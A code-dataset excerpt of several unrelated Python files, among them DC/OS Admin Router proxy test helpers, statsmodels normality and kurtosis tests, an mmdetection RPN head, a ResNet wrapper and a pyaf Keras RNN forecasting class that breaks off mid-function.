header_is_absent(resp.headers.items(), name)
def generic_upstream_cookies_verify_test(
ar,
headers,
path,
cookies_to_send=None,
assert_cookies_present=None,
assert_cookies_absent=None):
"""Test if cookies that are passed to the upstream by AR are correct
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): headers dict that contains DC/OS authentication token
and cookies. The auth data it contains must be valid.
path (str): path for which request should be made
cookies_to_send (dict): dictionary containing all the cookies that should
be send in the request
assert_cookies_present (dict): cookies to test where key is the
asserted cookie name and value is expected value of the cookie
assert_cookies_absent (list or set): cookies that *MUST NOT* be present
in the upstream request
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
cookies=cookies_to_send,
allow_redirects=False,
headers=headers)
assert resp.status_code == 200
req_data = resp.json()
# Let's make sure that we got not more than one 'Cookie' header:
# https://tools.ietf.org/html/rfc6265#section-5.4
cookie_headers = []
for header in req_data['headers']:
if header[0] == 'Cookie':
cookie_headers.append(header)
assert len(cookie_headers) <= 1
if len(cookie_headers) == 1:
jar = cookies.SimpleCookie()
# It is a list containing a single tuple (`header name`, `header value`),
# we need the second element of it - the value of the header:
jar.load(cookie_headers[0][1])
else:
jar = {}
if assert_cookies_present is not None:
jar_cookies_dict = {x: jar[x].value for x in jar if x in assert_cookies_present}
# We only want to check the keys present in cookies_present_dict
assert jar_cookies_dict == assert_cookies_present
if assert_cookies_absent is not None:
jar_cookies_set = set(jar.keys())
cookies_absent_set = set(assert_cookies_absent)
assert jar_cookies_set.intersection(cookies_absent_set) == set()
def generic_upstream_headers_verify_test(
ar, auth_header, path, assert_headers=None, assert_headers_absent=None):
"""Test if headers sent upstream are correct
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
auth_header (dict): headers dict that contains DC/OS authentication
token. The auth data it contains is valid and the request should be
accepted.
path (str): path for which request should be made
assert_headers (dict): additional headers to test where key is the
asserted header name and value is expected value
assert_headers_absent (dict): headers that *MUST NOT* be present in the
upstream request
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
allow_redirects=False,
headers=auth_header)
assert resp.status_code == 200
req_data = resp.json()
verify_header(req_data['headers'], 'X-Forwarded-For', '127.0.0.1')
verify_header(req_data['headers'], 'X-Forwarded-Proto', 'http')
verify_header(req_data['headers'], 'X-Real-IP', '127.0.0.1')
if assert_headers is not None:
for name, value in assert_headers.items():
verify_header(req_data['headers'], name, value)
if assert_headers_absent is not None:
for name in assert_headers_absent:
header_is_absent(req_data['headers'], name)
def generic_correct_upstream_dest_test(ar, headers, path, endpoint_id):
"""Test if upstream request has been sent to correct upstream
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): dictionary containing the headers to send
to the tested AR instance.
path (str): path for which request should be made
endpoint_id (str): id of the endpoint where the upstream request should
have been sent
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
allow_redirects=False,
headers=headers)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == endpoint_id
def generic_correct_upstream_request_test(
ar, headers, given_path, expected_path, http_ver='HTTP/1.0'):
"""Test if path component of the request sent upstream is correct.
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): dictionary containing the headers to send
to the tested AR instance.
given_path (str): path for which request should be made
expected_path (str): path that is expected to be sent to upstream
http_ver (str): http version string that the upstream request should be
made with
"""
h = copy.deepcopy(headers)
if http_ver == 'HTTP/1.1':
# In case of HTTP/1.1 connections, we also need to test if Connection
# header is cleared.
h['Connection'] = 'close'
elif http_ver == 'websockets':
h['Connection'] = 'close'
h['Upgrade'] = 'Websockets'
url = ar.make_url_from_path(given_path)
resp = requests.get(url,
allow_redirects=False,
headers=h)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['method'] == 'GET'
assert req_data['path'] == expected_path
if http_ver == 'HTTP/1.1':
header_is_absent(req_data['headers'], 'Connection')
assert req_data['request_version'] == 'HTTP/1.1'
elif http_ver == 'websockets':
verify_header(req_data['headers'], 'Connection', 'upgrade')
verify_header(req_data['headers'], 'Upgrade', 'Websockets')
assert req_data['request_version'] == 'HTTP/1.1'
else:
assert req_data['request_version'] == http_ver
def generic_location_header_during_redirect_is_adjusted_test(
ar,
mocker,
headers,
endpoint_id,
basepath,
location_set,
location_expected,
):
"""Test if the `Location` header is rewritten by AR on redirect.
This generic test issues a request to AR for a given path and verifies that
redirect has occurred with the `Location` header contents equal to
`location_expected` argument.
Arguments:
mocker (Mocker): instance of the Mocker class, used for controlling
upstream HTTP endpoint/mock
ar: Admin Router object, an instance of `runner.(ee|open).Nginx`.
headers (dict): dictionary containing the headers to send
to the tested AR instance.
endpoint_id (str): id of the endpoint where the upstream request should
have been sent.
basepath (str): the URI used by the test harness to issue the request
to AR, and to which we are expecting AR to respond with rewritten
`Location` header redirect.
location_set (str): upstream will send the response with the `Location`
header set to this value.
location_expected (str): the expected value of the `Location` header
after being rewritten/adjusted by AR.
"""
mocker.send_command(endpoint_id=endpoint_id,
func_name='always_redirect',
aux_data=location_set)
url = ar.make_url_from_path(basepath)
r = requests.get(url, allow_redirects=False, headers=headers)
assert r.status_code == 307
# if Location is relative, make it absolute
absolute = urljoin(url, r.headers['Location'])
assert absolute == location_expected
def header_is_absent(headers, header_name):
"""Test if given header is present in the request headers list
Arguments:
headers (list): list of tuples containing all the headers present in
the reflected request data
header_name (string): name of the header that should not be present/must
not be set.
Raises:
AssertionError: header with the name "header_name" was found in
supplied header list.
"""
for header in headers:
assert header[0] != header_name
def verify_header(headers, header_name, header_value):
"""Asserts that particular header exists and has correct value.
Helper function for checking if header with given name has been defined
with correct value in given headers list. The headers list is in format
defined by requests module.
Presence of more than one header with given name or incorrect value raises
assert statement.
Args:
header_name (str): header name to seek
header_value (str): expected value of the header
headers (obj: [('h1', 'v1'), ('h2', 'v2'), ...]): a list of header
name-val tuples
Raises:
AssertionError: header has not been found, there is more than one header
with given name or header has incorrect value
"""
matching_headers = list()
for header in headers:
if header[0] == header_name:
matching_headers.append(header)
# Hmmm....
if len(matching_headers) != 1:
if len(matching_headers) == 0:
msg = "Header `{}` has not been found".format(header_name)
elif len(matching_headers) > 1:
msg = "More than one `{}` header has been found".format(header_name)
assert len(matching_headers) == 1, msg
assert matching_headers[0][1] == header_value
def assert_endpoint_response(
ar,
path,
code,
assert_error_log=None,
headers=None,
cookies=None,
assertions=None
):
"""Asserts response code and log messages in Admin Router stderr for
request against specified path.
Arguments:
ar (Nginx): Running instance of the AR
code (int): Expected response code
assert_error_log (dict): LineBufferFilter compatible definition of messages
to assert
cookies (dict): Optionally provide request cookies
headers (dict): Optionally provide request headers
assertions (List[lambda r]) Optionally provide additional assertions
for the response
"""
def body():
r = requests.get(
ar.make_url_from_path(path),
headers=headers,
cookies=cookies,
)
assert r.status_code == code
if assertions:
for func in assertions:
assert func(r)
if assert_error_log is not None:
# for testing, log messages go to both stderr and to /dev/log
with LineBufferFilter(
copy.deepcopy(assert_error_log), line_buffer=ar.stderr_line_buffer
) as stderr:
with LineBufferFilter(
assert_error_log, line_buffer=ar.syslog_line_buffer
) as syslog:
body()
assert stderr.extra_matches == {}
assert syslog.extra_matches == {}
else:
body()
@contextmanager
def overridden_file_content(file_path, new_content=None):
"""Context manager meant to simplify static files testsing
While inside the context, file can be modified and/or modified content
may be injected by the context manager itself. Right after context is
exited, the original file contents are restored.
Arguments:
file_path: path the the file that should be "guarded"
new_content: new content for the file. If None - file contents are not
changed, "string" objects are translated to binary blob first,
assuming utf-8 encoding.
"""
if new_content is not None and not isinstance(new_content, bytes):
new_content = new_content.encode('utf-8')
with open(file_path, 'rb+') as fh:
old_content = fh.read()
if new_content is not None:
fh.seek(0)
fh.write(new_content)
fh.truncate()
yield
with open(file_path, 'wb') as fh:
fh.write(old_content)
def repo_is_ee():
"""Determine the flavour of the repository
Return:
True if repository is EE
"""
cur_dir = os.path.dirname(__file__)
ee_tests_dir = os.path.abspath(os.path.join(cur_dir, "..", "..", "tests", "ee"))
open_tests_dir = os.path.abspath(os.path.join(cur_dir, "..", "..", "tests", "open"))
is_ee = os.path.isdir(ee_tests_dir) and not os.path.isdir(open_tests_dir)
is_open = os.path.isdir(open_tests_dir) and not os.path.isdir(ee_tests_dir)
assert is_ee or is_open, "Unable to determine the variant of the repo"
return is_ee
|
venv/Lib/site-packages/statsmodels/stats/tests/test_statstools.py
|
EkremBayar/bayar
| 6,931 |
129645
|
<gh_stars>1000+
# TODO: Test robust skewness
# TODO: Test robust kurtosis
import numpy as np
import pandas as pd
from numpy.testing import (assert_almost_equal, assert_raises, assert_equal,
assert_allclose)
from statsmodels.stats._adnorm import normal_ad
from statsmodels.stats.stattools import (omni_normtest, jarque_bera,
durbin_watson, _medcouple_1d, medcouple,
robust_kurtosis, robust_skewness)
# a random array, rounded to 4 decimals
x = np.array([-0.1184, -1.3403, 0.0063, -0.612, -0.3869, -0.2313, -2.8485,
-0.2167, 0.4153, 1.8492, -0.3706, 0.9726, -0.1501, -0.0337,
-1.4423, 1.2489, 0.9182, -0.2331, -0.6182, 0.183])
def test_durbin_watson():
#benchmark values from R car::durbinWatsonTest(x)
#library("car")
#> durbinWatsonTest(x)
#[1] 1.95298958377419
#> durbinWatsonTest(x**2)
#[1] 1.848802400319998
#> durbinWatsonTest(x[2:20]+0.5*x[1:19])
#[1] 1.09897993228779
#> durbinWatsonTest(x[2:20]+0.8*x[1:19])
#[1] 0.937241876707273
#> durbinWatsonTest(x[2:20]+0.9*x[1:19])
#[1] 0.921488912587806
st_R = 1.95298958377419
assert_almost_equal(durbin_watson(x), st_R, 14)
st_R = 1.848802400319998
assert_almost_equal(durbin_watson(x**2), st_R, 14)
st_R = 1.09897993228779
assert_almost_equal(durbin_watson(x[1:] + 0.5 * x[:-1]), st_R, 14)
st_R = 0.937241876707273
assert_almost_equal(durbin_watson(x[1:] + 0.8 * x[:-1]), st_R, 14)
st_R = 0.921488912587806
assert_almost_equal(durbin_watson(x[1:] + 0.9 * x[:-1]), st_R, 14)
X = np.array([x, x])
st_R = 1.95298958377419
assert_almost_equal(durbin_watson(X, axis=1), np.array([st_R, st_R]), 14)
assert_almost_equal(durbin_watson(X.T, axis=0), np.array([st_R, st_R]), 14)
def test_omni_normtest():
#tests against R fBasics
from scipy import stats
st_pv_R = np.array(
[[3.994138321207883, -1.129304302161460, 1.648881473704978],
[0.1357325110375005, 0.2587694866795507, 0.0991719192710234]])
nt = omni_normtest(x)
assert_almost_equal(nt, st_pv_R[:, 0], 14)
st = stats.skewtest(x)
assert_almost_equal(st, st_pv_R[:, 1], 14)
kt = stats.kurtosistest(x)
assert_almost_equal(kt, st_pv_R[:, 2], 11)
st_pv_R = np.array(
[[34.523210399523926, 4.429509162503833, 3.860396220444025],
[3.186985686465249e-08, 9.444780064482572e-06, 1.132033129378485e-04]])
x2 = x**2
#TODO: fix precision in these test with relative tolerance
nt = omni_normtest(x2)
assert_almost_equal(nt, st_pv_R[:, 0], 12)
st = stats.skewtest(x2)
assert_almost_equal(st, st_pv_R[:, 1], 12)
kt = stats.kurtosistest(x2)
assert_almost_equal(kt, st_pv_R[:, 2], 12)
def test_omni_normtest_axis(reset_randomstate):
#test axis of omni_normtest
x = np.random.randn(25, 3)
nt1 = omni_normtest(x)
nt2 = omni_normtest(x, axis=0)
nt3 = omni_normtest(x.T, axis=1)
assert_almost_equal(nt2, nt1, decimal=13)
assert_almost_equal(nt3, nt1, decimal=13)
def test_jarque_bera():
#tests against R fBasics
st_pv_R = np.array([1.9662677226861689, 0.3741367669648314])
jb = jarque_bera(x)[:2]
assert_almost_equal(jb, st_pv_R, 14)
st_pv_R = np.array([78.329987305556, 0.000000000000])
jb = jarque_bera(x**2)[:2]
assert_almost_equal(jb, st_pv_R, 13)
st_pv_R = np.array([5.7135750796706670, 0.0574530296971343])
jb = jarque_bera(np.log(x**2))[:2]
assert_almost_equal(jb, st_pv_R, 14)
st_pv_R = np.array([2.6489315748495761, 0.2659449923067881])
jb = jarque_bera(np.exp(-x**2))[:2]
assert_almost_equal(jb, st_pv_R, 14)
def test_shapiro():
#tests against R fBasics
#testing scipy.stats
from scipy.stats import shapiro
st_pv_R = np.array([0.939984787255526, 0.239621898000460])
sh = shapiro(x)
assert_almost_equal(sh, st_pv_R, 4)
#st is ok -7.15e-06, pval agrees at -3.05e-10
st_pv_R = np.array([5.799574255943298e-01, 1.838456834681376e-06 * 1e4])
sh = shapiro(x**2) * np.array([1, 1e4])
assert_almost_equal(sh, st_pv_R, 5)
st_pv_R = np.array([0.91730442643165588, 0.08793704167882448])
sh = shapiro(np.log(x**2))
assert_almost_equal(sh, st_pv_R, 5)
#diff is [ 9.38773155e-07, 5.48221246e-08]
st_pv_R = np.array([0.818361863493919373, 0.001644620895206969])
sh = shapiro(np.exp(-x**2))
assert_almost_equal(sh, st_pv_R, 5)
def test_adnorm():
#tests against R fBasics
st_pv = []
st_pv_R = np.array([0.5867235358882148, 0.1115380760041617])
ad = normal_ad(x)
assert_almost_equal(ad, st_pv_R, 12)
st_pv.append(st_pv_R)
st_pv_R = np.array([2.976266267594575e+00, 8.753003709960645e-08])
ad = normal_ad(x**2)
assert_almost_equal(ad, st_pv_R, 11)
st_pv.append(st_pv_R)
st_pv_R = np.array([0.4892557856308528, 0.1968040759316307])
ad = normal_ad(np.log(x**2))
assert_almost_equal(ad, st_pv_R, 12)
st_pv.append(st_pv_R)
st_pv_R = np.array([1.4599014654282669312, 0.0006380009232897535])
ad = normal_ad(np.exp(-x**2))
assert_almost_equal(ad, st_pv_R, 12)
st_pv.append(st_pv_R)
ad = normal_ad(np.column_stack((x, x**2, np.log(x**2), np.exp(-x**2))).T,
axis=1)
assert_almost_equal(ad, np.column_stack(st_pv), 11)
def test_durbin_watson_pandas(reset_randomstate):
x = np.random.randn(50)
x_series = pd.Series(x)
assert_almost_equal(durbin_watson(x), durbin_watson(x_series), decimal=13)
class TestStattools(object):
@classmethod
def setup_class(cls):
x = np.random.standard_normal(1000)
e1, e2, e3, e4, e5, e6, e7 = np.percentile(x, (12.5, 25.0, 37.5, 50.0, 62.5, 75.0, 87.5))
c05, c50, c95 = np.percentile(x, (5.0, 50.0, 95.0))
f025, f25, f75, f975 = np.percentile(x, (2.5, 25.0, 75.0, 97.5))
mean = np.mean
kr1 = mean(((x - mean(x)) / np.std(x))**4.0) - 3.0
kr2 = ((e7 - e5) + (e3 - e1)) / (e6 - e2) - 1.2330951154852172
kr3 = (mean(x[x > c95]) - mean(x[x < c05])) / (mean(x[x > c50]) - mean(x[x < c50])) - 2.5852271228708048
kr4 = (f975 - f025) / (f75 - f25) - 2.9058469516701639
cls.kurtosis_x = x
cls.expected_kurtosis = np.array([kr1, kr2, kr3, kr4])
cls.kurtosis_constants = np.array([3.0,1.2330951154852172,2.5852271228708048,2.9058469516701639])
def test_medcouple_no_axis(self):
x = np.reshape(np.arange(100.0), (50, 2))
mc = medcouple(x, axis=None)
assert_almost_equal(mc, medcouple(x.ravel()))
def test_medcouple_1d(self):
x = np.reshape(np.arange(100.0),(50,2))
assert_raises(ValueError, _medcouple_1d, x)
def test_medcouple_symmetric(self):
mc = medcouple(np.arange(5.0))
assert_almost_equal(mc, 0)
def test_medcouple_nonzero(self):
mc = medcouple(np.array([1, 2, 7, 9, 10.0]))
assert_almost_equal(mc, -0.3333333)
def test_medcouple_int(self):
# GH 4243
mc1 = medcouple(np.array([1, 2, 7, 9, 10]))
mc2 = medcouple(np.array([1, 2, 7, 9, 10.0]))
assert_equal(mc1, mc2)
def test_medcouple_symmetry(self, reset_randomstate):
x = np.random.standard_normal(100)
mcp = medcouple(x)
mcn = medcouple(-x)
assert_almost_equal(mcp + mcn, 0)
def test_medcouple_ties(self, reset_randomstate):
x = np.array([1, 2, 2, 3, 4])
mc = medcouple(x)
assert_almost_equal(mc, 1.0 / 6.0)
def test_durbin_watson(self, reset_randomstate):
x = np.random.standard_normal(100)
dw = sum(np.diff(x)**2.0) / np.dot(x, x)
assert_almost_equal(dw, durbin_watson(x))
def test_durbin_watson_2d(self, reset_randomstate):
shape = (1, 10)
x = np.random.standard_normal(100)
dw = sum(np.diff(x)**2.0) / np.dot(x, x)
x = np.tile(x[:, None], shape)
assert_almost_equal(np.squeeze(dw * np.ones(shape)), durbin_watson(x))
def test_durbin_watson_3d(self, reset_randomstate):
shape = (10, 1, 10)
x = np.random.standard_normal(100)
dw = sum(np.diff(x)**2.0) / np.dot(x, x)
x = np.tile(x[None, :, None], shape)
assert_almost_equal(np.squeeze(dw * np.ones(shape)), durbin_watson(x, axis=1))
def test_robust_skewness_1d(self):
x = np.arange(21.0)
sk = robust_skewness(x)
assert_almost_equal(np.array(sk), np.zeros(4))
def test_robust_skewness_1d_2d(self, reset_randomstate):
x = np.random.randn(21)
y = x[:, None]
sk_x = robust_skewness(x)
sk_y = robust_skewness(y, axis=None)
assert_almost_equal(np.array(sk_x), np.array(sk_y))
def test_robust_skewness_symmetric(self, reset_randomstate):
x = np.random.standard_normal(100)
x = np.hstack([x, np.zeros(1), -x])
sk = robust_skewness(x)
assert_almost_equal(np.array(sk), np.zeros(4))
def test_robust_skewness_3d(self, reset_randomstate):
x = np.random.standard_normal(100)
x = np.hstack([x, np.zeros(1), -x])
x = np.tile(x, (10, 10, 1))
sk_3d = robust_skewness(x, axis=2)
result = np.zeros((10, 10))
for sk in sk_3d:
assert_almost_equal(sk, result)
def test_robust_skewness_4(self, reset_randomstate):
x = np.random.standard_normal(1000)
x[x > 0] *= 3
m = np.median(x)
s = x.std(ddof=0)
expected = (x.mean() - m) / s
_, _, _, sk4 = robust_skewness(x)
assert_allclose(expected, sk4)
def test_robust_kurtosis_1d_2d(self, reset_randomstate):
x = np.random.randn(100)
y = x[:, None]
kr_x = np.array(robust_kurtosis(x))
kr_y = np.array(robust_kurtosis(y, axis=None))
assert_almost_equal(kr_x, kr_y)
def test_robust_kurtosis(self):
x = self.kurtosis_x
assert_almost_equal(np.array(robust_kurtosis(x)), self.expected_kurtosis)
def test_robust_kurtosis_3d(self):
x = np.tile(self.kurtosis_x, (10, 10, 1))
kurtosis = np.array(robust_kurtosis(x, axis=2))
for i, r in enumerate(self.expected_kurtosis):
assert_almost_equal(r * np.ones((10, 10)), kurtosis[i])
def test_robust_kurtosis_excess_false(self):
x = self.kurtosis_x
expected = self.expected_kurtosis + self.kurtosis_constants
kurtosis = np.array(robust_kurtosis(x, excess=False))
assert_almost_equal(expected, kurtosis)
def test_robust_kurtosis_ab(self):
# Test custom alpha, beta in kr3
x = self.kurtosis_x
alpha, beta = (10.0, 45.0)
kurtosis = robust_kurtosis(self.kurtosis_x, ab=(alpha,beta), excess=False)
num = np.mean(x[x>np.percentile(x,100.0 - alpha)]) - np.mean(x[x<np.percentile(x,alpha)])
denom = np.mean(x[x>np.percentile(x,100.0 - beta)]) - np.mean(x[x<np.percentile(x,beta)])
assert_almost_equal(kurtosis[2], num/denom)
def test_robust_kurtosis_dg(self):
# Test custom delta, gamma in kr4
x = self.kurtosis_x
delta, gamma = (10.0, 45.0)
kurtosis = robust_kurtosis(self.kurtosis_x, dg=(delta,gamma), excess=False)
q = np.percentile(x,[delta, 100.0-delta, gamma, 100.0-gamma])
assert_almost_equal(kurtosis[3], (q[1] - q[0]) / (q[3] - q[2]))
|
notebooks/_solutions/pandas_06_groupby_operations30.py
|
rprops/Python_DS-WS
| 183 |
129657
|
hamlets = titles[titles['title'].str.contains('Hamlet')]
hamlets['title'].value_counts()
|
mmdet/models/anchor_heads/rpn_head.py
|
TJUsym/TJU_Advanced_CV_Homework
| 1,158 |
129659
|
<reponame>TJUsym/TJU_Advanced_CV_Homework
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import normal_init
from mmdet.core import delta2bbox
from mmdet.ops import nms
from .anchor_head import AnchorHead
from ..registry import HEADS
@HEADS.register_module
class RPNHead(AnchorHead):
def __init__(self, in_channels, **kwargs):
super(RPNHead, self).__init__(2, in_channels, **kwargs)
def _init_layers(self):
self.rpn_conv = nn.Conv2d(
self.in_channels, self.feat_channels, 3, padding=1)
self.rpn_cls = nn.Conv2d(self.feat_channels,
self.num_anchors * self.cls_out_channels, 1)
self.rpn_reg = nn.Conv2d(self.feat_channels, self.num_anchors * 4, 1)
def init_weights(self):
normal_init(self.rpn_conv, std=0.01)
normal_init(self.rpn_cls, std=0.01)
normal_init(self.rpn_reg, std=0.01)
def forward_single(self, x):
x = self.rpn_conv(x)
x = F.relu(x, inplace=True)
rpn_cls_score = self.rpn_cls(x)
rpn_bbox_pred = self.rpn_reg(x)
return rpn_cls_score, rpn_bbox_pred
def loss(self,
cls_scores,
bbox_preds,
gt_bboxes,
img_metas,
cfg,
gt_bboxes_ignore=None):
losses = super(RPNHead, self).loss(
cls_scores,
bbox_preds,
gt_bboxes,
None,
img_metas,
cfg,
gt_bboxes_ignore=gt_bboxes_ignore)
return dict(
loss_rpn_cls=losses['loss_cls'], loss_rpn_bbox=losses['loss_bbox'])
def get_bboxes_single(self,
cls_scores,
bbox_preds,
mlvl_anchors,
img_shape,
scale_factor,
cfg,
rescale=False):
mlvl_proposals = []
for idx in range(len(cls_scores)):
rpn_cls_score = cls_scores[idx]
rpn_bbox_pred = bbox_preds[idx]
assert rpn_cls_score.size()[-2:] == rpn_bbox_pred.size()[-2:]
anchors = mlvl_anchors[idx]
rpn_cls_score = rpn_cls_score.permute(1, 2, 0)
if self.use_sigmoid_cls:
rpn_cls_score = rpn_cls_score.reshape(-1)
scores = rpn_cls_score.sigmoid()
else:
rpn_cls_score = rpn_cls_score.reshape(-1, 2)
scores = rpn_cls_score.softmax(dim=1)[:, 1]
rpn_bbox_pred = rpn_bbox_pred.permute(1, 2, 0).reshape(-1, 4)
if cfg.nms_pre > 0 and scores.shape[0] > cfg.nms_pre:
_, topk_inds = scores.topk(cfg.nms_pre)
rpn_bbox_pred = rpn_bbox_pred[topk_inds, :]
anchors = anchors[topk_inds, :]
scores = scores[topk_inds]
proposals = delta2bbox(anchors, rpn_bbox_pred, self.target_means,
self.target_stds, img_shape)
if cfg.min_bbox_size > 0:
w = proposals[:, 2] - proposals[:, 0] + 1
h = proposals[:, 3] - proposals[:, 1] + 1
valid_inds = torch.nonzero((w >= cfg.min_bbox_size) &
(h >= cfg.min_bbox_size)).squeeze()
proposals = proposals[valid_inds, :]
scores = scores[valid_inds]
proposals = torch.cat([proposals, scores.unsqueeze(-1)], dim=-1)
proposals, _ = nms(proposals, cfg.nms_thr)
proposals = proposals[:cfg.nms_post, :]
mlvl_proposals.append(proposals)
proposals = torch.cat(mlvl_proposals, 0)
if cfg.nms_across_levels:
proposals, _ = nms(proposals, cfg.nms_thr)
proposals = proposals[:cfg.max_num, :]
else:
scores = proposals[:, 4]
num = min(cfg.max_num, proposals.shape[0])
_, topk_inds = scores.topk(num)
proposals = proposals[topk_inds, :]
return proposals
|
desktop/core/ext-py/nose-1.3.7/functional_tests/doc_tests/test_issue119/test_zeronine.py
|
kokosing/hue
| 5,079 |
129691
|
import os
import unittest
from nose.plugins import Plugin
from nose.plugins.plugintest import PluginTester
from nose.plugins.manager import ZeroNinePlugin
here = os.path.abspath(os.path.dirname(__file__))
support = os.path.join(os.path.dirname(os.path.dirname(here)), 'support')
class EmptyPlugin(Plugin):
pass
class TestEmptyPlugin(PluginTester, unittest.TestCase):
activate = '--with-empty'
plugins = [ZeroNinePlugin(EmptyPlugin())]
suitepath = os.path.join(here, 'empty_plugin.rst')
def test_empty_zero_nine_does_not_crash(self):
print self.output
assert "'EmptyPlugin' object has no attribute 'loadTestsFromPath'" \
not in self.output
|
code/resnet.py
|
noammy/videowalk
| 227 |
129706
|
<filename>code/resnet.py
import torch
import torch.nn as nn
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
import torchvision.models.resnet as torch_resnet
from torchvision.models.resnet import BasicBlock, Bottleneck
model_urls = {'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
}
class ResNet(torch_resnet.ResNet):
def __init__(self, *args, **kwargs):
super(ResNet, self).__init__(*args, **kwargs)
def modify(self, remove_layers=[], padding=''):
# Set stride of layer3 and layer 4 to 1 (from 2)
filter_layers = lambda x: [l for l in x if getattr(self, l) is not None]
for layer in filter_layers(['layer3', 'layer4']):
for m in getattr(self, layer).modules():
if isinstance(m, torch.nn.Conv2d):
m.stride = tuple(1 for _ in m.stride)
print('stride', m)
# Set padding (zeros or reflect, doesn't change much;
# zeros requires lower temperature)
if padding != '':
for m in self.modules():
if isinstance(m, torch.nn.Conv2d) and sum(m.padding) > 0:
m.padding_mode = padding
print('padding', m)
# Remove extraneous layers
remove_layers += ['fc', 'avgpool']
for layer in filter_layers(remove_layers):
setattr(self, layer, None)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = x if self.maxpool is None else self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = x if self.layer3 is None else self.layer3(x)
x = x if self.layer4 is None else self.layer4(x)
return x
def _resnet(arch, block, layers, pretrained, progress, **kwargs):
model = ResNet(block, layers, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
return model
def resnet18(pretrained=False, progress=True, **kwargs):
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,
**kwargs)
def resnet50(pretrained=False, progress=True, **kwargs) -> ResNet:
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,
**kwargs)
|
pyaf/TS/Keras_Models.py
|
shaido987/pyaf
| 377 |
129713
|
<reponame>shaido987/pyaf
import numpy as np
import pandas as pd
# from sklearn.preprocessing import StandardScaler, MinMaxScaler
from . import SignalDecomposition_AR as tsar
import sys
class cAbstract_RNN_Model(tsar.cAbstractAR):
def __init__(self , cycle_residue_name, P , iExogenousInfo = None):
super().__init__(cycle_residue_name, iExogenousInfo)
self.mNbLags = P;
self.mNbExogenousLags = P;
self.mComplexity = P;
self.mHiddenUnits = P;
self.mNbEpochs = 50;
sys.setrecursionlimit(1000000);
def dumpCoefficients(self, iMax=10):
# print(self.mModel.__dict__);
pass
def build_RNN_Architecture(self):
assert(0);
# def reshape_inputs(self, iInputs):
# return iInputs;
def reshape_inputs(self, iInputs):
lInputs = np.reshape(iInputs, (iInputs.shape[0], 1, iInputs.shape[1]))
return lInputs;
def fit(self):
# print("ESTIMATE_RNN_MODEL_START" , self.mCycleResidueName);
from keras import callbacks
self.build_RNN_Architecture();
# print("ESTIMATE_RNN_MODEL_STEP1" , self.mOutName);
series = self.mCycleResidueName;
self.mTime = self.mTimeInfo.mTime;
self.mSignal = self.mTimeInfo.mSignal;
lAREstimFrame = self.mSplit.getEstimPart(self.mARFrame)
# print("ESTIMATE_RNN_MODEL_STEP2" , self.mOutName);
# print("mAREstimFrame columns :" , self.mAREstimFrame.columns);
lARInputs = lAREstimFrame[self.mInputNames].values
lARTarget = lAREstimFrame[series].values
# print(len(self.mInputNames), lARInputs.shape , lARTarget.shape)
assert(lARInputs.shape[1] > 0);
assert(lARTarget.shape[0] > 0);
# print("ESTIMATE_RNN_MODEL_STEP3" , self.mOutName);
lARInputs = self.reshape_inputs(lARInputs)
lARTarget = self.reshape_target(lARTarget)
N = lARInputs.shape[0];
NEstim = (N * 4) // 5;
estimX = lARInputs[0:NEstim]
estimY = lARTarget[0:NEstim]
valX = lARInputs[ NEstim : ]
valY = lARTarget[ NEstim : ]
# print("SHAPES" , self.mFormula, estimX.shape , estimY.shape)
# print("ESTIMATE_RNN_MODEL_STEP4" , self.mOutName);
lStopCallback = callbacks.EarlyStopping(monitor='val_loss', patience=5, verbose=0, mode='auto')
lHistory = self.mModel.fit(estimX, estimY,
epochs=self.mNbEpochs,
batch_size=1,
validation_data=(valX , valY),
verbose=0,
callbacks=[lStopCallback])
# print(lHistory.__dict__)
# print("ESTIMATE_RNN_MODEL_STEP5" , self.mOutName);
lFullARInputs = self.mARFrame[self.mInputNames].values;
lFullARInputs = self.reshape_inputs(lFullARInputs)
# print("ESTIMATE_RNN_MODEL_STEP6" , self.mOutName);
lPredicted = self.mModel.predict(lFullARInputs);
# print("PREDICTED_SHAPE" , self.mARFrame.shape, lPredicted.shape);
# print("ESTIMATE_RNN_MODEL_STEP7" , self.mOutName);
self.mARFrame[self.mOutName] = np.reshape(lPredicted, (lPredicted.shape[0]))
# print("ESTIMATE_RNN_MODEL_STEP8" , self.mOutName);
self.mARFrame[self.mOutName + '_residue'] = self.mARFrame[series] - self.mARFrame[self.mOutName]
# print("ESTIMATE_RNN_MODEL_END" , self.mOutName, self.mModel.__dict__);
# self.testPickle_old();
def transformDataset(self, df, horizon_index = 1):
series = self.mCycleResidueName;
if(self.mExogenousInfo is not None):
df = self.mExogenousInfo.transformDataset(df);
# print(df.columns);
# print(df.info());
# print(df.head());
# print(df.tail());
lag_df = self.generateLagsForForecast(df);
# print(self.mInputNames);
# lag_df.to_csv("LAGGED_ " + str(self.mNbLags) + ".csv");
inputs = lag_df[self.mInputNames].values
inputs = self.reshape_inputs(inputs)
# print("BEFORE_PREDICT", self.mFormula, "\n", self.mModel.__dict__);
lPredicted = self.mModel.predict(inputs)
lPredicted = np.reshape(lPredicted, (lPredicted.shape[0]))
df[self.mOutName] = lPredicted;
target = df[series].values
